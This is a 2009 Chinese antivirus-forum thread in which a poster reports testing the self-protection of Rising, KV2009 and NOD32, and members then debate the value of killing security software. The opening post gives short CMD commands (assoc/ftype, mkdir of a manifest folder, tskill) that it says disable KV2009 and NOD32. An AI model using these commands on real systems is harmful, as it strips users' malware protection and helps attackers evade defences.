微点交流论坛 - 反病毒 - 【DELPHIC】两条CMD命令搞残KV2009 小测瑞星微点NOD32

» 游客: 注册 | 登录 | 帮助

微点交流论坛 » 反病毒 » 【DELPHIC】两条CMD命令搞残KV2009 小测瑞星微点NOD32

1/2

点饭的百度空间
银牌会员

积分 2315
发帖 2236
注册 2007-11-30

#1 【DELPHIC】两条CMD命令搞残KV2009 小测瑞星微点NOD32

Hovi.Delphic，男，17岁。热爱化学与计算机，也对文学感兴趣。在广州市一间重点中学读书。 E-Mail：Delphic@126.com；QQ：461515974。

瑞星2009和江民2009自我防护比较 [ 2009-3-21 21:34:20 | By: DELPHIC ]

   瑞星2009和江民2009都是国内著名的杀毒软件，近日我在虚拟机上测试了它们的自我防护能力。

   瑞星2009阻止别的程序结束它的进程，就是在SSDT上挂钩NtOpenProcess和NtTerminateProcess，“冰刃”恢复SSDT后，防护完全失效！接下来用“任务管理器”就可以轻易结束。瑞星的进程被结束后，什么“云安全”，“智能主动防御”全都废了。

      相比之下，江民2009的防护超级变态，Inline hook了如下函数：NtOpenProcess、ObOpenObjectByPointer、ObpCreateHandle、NtTerminateProcess、PspTerminateThreadByPointer、KeInsertQueueApc、KiInsertQueueApc，还有一些防止进程或线程被挂起的函数。而且时时监视自己的钩子有没有被恢复，如果被恢复马上重新钩上。我唯一想到结束它的进程的方法就是手动对其进程的线程插入APC。

      以前（大约2008年11月），我还测试过微点主动防御软件（没在意具体版本）、Nod32（没在意具体版本）、卡巴斯基7.0、诺顿10.0，也很好杀，连安全工具“狙剑”都不如。

两条CMD命令搞残KV2009 [ 2009-3-22 13:24:29 | By: DELPHIC ]

我曾经说过，KV2009很难杀，但是我今天想到一个办法，可以用干掉KV2009的托盘图标。

assoc .kxp=kxpf
ftype kxpf=smss.exe

   重新启动后，KV2009的托盘图标就消失了。而且，KV2009的主动防御功能貌似也失效了。接下来怎么做，就要看人品了。

四条CMD命令彻底干掉NOD32 [ 2009-4-9 12:54:25 | By: DELPHIC ]

NOD32是我见过的最好欺负的杀毒软件，因为干掉它不仅不用编程，连“映像劫持”这种稍微高级的技术也不用。真是不知道它是怎样进入“世界杀软前十名”的。废话不说，直接给出CMD代码。[NOD32的目录是C:\Program Files\ESET\ESET NOD32 Antivirus，测试版本是3.0.669。]

mkdir C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe.manifest
mkdir C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe.manifest
tskill ekrn
tskill egui

下次开机后NOD32也运行不了了。

※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【微点交流论坛】立场无关※ ※ ※

你的微笑 is 微点的骄傲！
http://hi.baidu.com/new/micropoint

2009-5-8 09:32

snhao
银牌会员

积分 1791
发帖 1782
注册 2007-6-12

#2

能干掉微点么？

※ ※ ※ 本文纯属【snhao】个人意见，与【微点交流论坛】立场无关※ ※ ※

东方微点论坛

2009-5-8 10:18

mamsds
银牌会员

积分 1373
发帖 1360
注册 2008-3-15
来自乌克兰

#3

不太理解楼主的意思——不过NOD32是很废..........

※ ※ ※ 本文纯属【mamsds】个人意见，与【微点交流论坛】立场无关※ ※ ※

Vi Veri Veniversum Vivus Vici.

2009-5-8 17:39

wsmurderer
高级用户

积分 676
发帖 668
注册 2008-11-21

Quote:

我还测试过微点主动防御软件（没在意具体版本）、Nod32（没在意具体版本）、卡巴斯基7.0、诺顿10.0，也很好杀，连安全工具“狙剑”都不如。

微点号称自保很强大，事实上干掉微点也不是什么难事

※ ※ ※ 本文纯属【wsmurderer】个人意见，与【微点交流论坛】立场无关※ ※ ※

2009-5-8 20:57

z010q3w
新手上路

积分 33
发帖 33
注册 2009-3-5

#5

总不能是万能的吧。
自己也要做个备份恢复什么的

到时候不要后悔。

在网上还见过几个杀毒软件搭配的

唉！难说啊

※ ※ ※ 本文纯属【z010q3w】个人意见，与【微点交流论坛】立场无关※ ※ ※

2009-5-9 18:29

miniputty
新手上路

积分 39
发帖 39
注册 2007-7-5

#6

用CMD有意义吗？要这么说，用个shutdown，我还说能搞残你电脑呢。。。摆脱搞点有实际意义的。

※ ※ ※ 本文纯属【miniputty】个人意见，与【微点交流论坛】立场无关※ ※ ※

2009-5-10 09:51

mamsds
银牌会员

积分 1373
发帖 1360
注册 2008-3-15
来自乌克兰

#7

不好意思，很多HIPS已经会拦截shutdown了。

※ ※ ※ 本文纯属【mamsds】个人意见，与【微点交流论坛】立场无关※ ※ ※

Vi Veri Veniversum Vivus Vici.

2009-5-23 13:00

zqrsc
版主

反病毒区版主

积分 1133
发帖 1118
注册 2005-11-22
来自 .net

#8

用瓶矿泉水~~~有HIPS能拦截不？
呵呵~

※ ※ ※ 本文纯属【zqrsc】个人意见，与【微点交流论坛】立场无关※ ※ ※

偶在~ 偶一直在~ 偶永远都在~偶不可救药的无处不在~

2009-5-27 01:33

微点放大是焦点
高级用户

积分 783
发帖 765
注册 2007-2-10
来自广州

#9

干掉杀软这种做法我认为不是病毒的主流发展方向，毕竟这样做会惊动用户的警戒意识。哪怕你干掉用户当前的安全软件，用户也会去寻找其他的软件对自己的系统进行防护，没什么木马能100%的防止所有软件的查杀的。

利用批处理这种行为干掉安全软件难度是不难，问题是你这个批处理如何才能混进来而且能顺利执行？

总结一点，干掉安全软件这个做法只是一些性急得像猴子的渗透者的暴力做法。因为他们连加壳，或者如何改变自己的运作机理逃避主防的耐性都没了。

※ ※ ※ 本文纯属【微点放大是焦点】个人意见，与【微点交流论坛】立场无关※ ※ ※

天将降大任于是微点,必先苦其老总,劳其同事,饿其用户,空乏资金,官司乱其所为,所以动心忍性,销售其所不能。

2009-5-28 06:01

wsmurderer
高级用户

积分 676
发帖 668
注册 2008-11-21

#10

Quote:

Originally posted by 微点放大是焦点 at 2009-5-28 06:01:
干掉杀软这种做法我认为不是病毒的主流发展方向，毕竟这样做会惊动用户的警戒意识。哪怕你干掉用户当前的安全软件，用户也会去寻找其他的软件对自己的系统进行防护，没什么木马能100%的防止所有软件的查杀的。

...

不一定吧，有些人为了炫耀自己就是喜欢干杀软，毁系统，删资料，格磁盘。不然怎么会有熊猫的出现，不就是炫耀么？

※ ※ ※ 本文纯属【wsmurderer】个人意见，与【微点交流论坛】立场无关※ ※ ※

2009-5-28 07:01

1/2

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号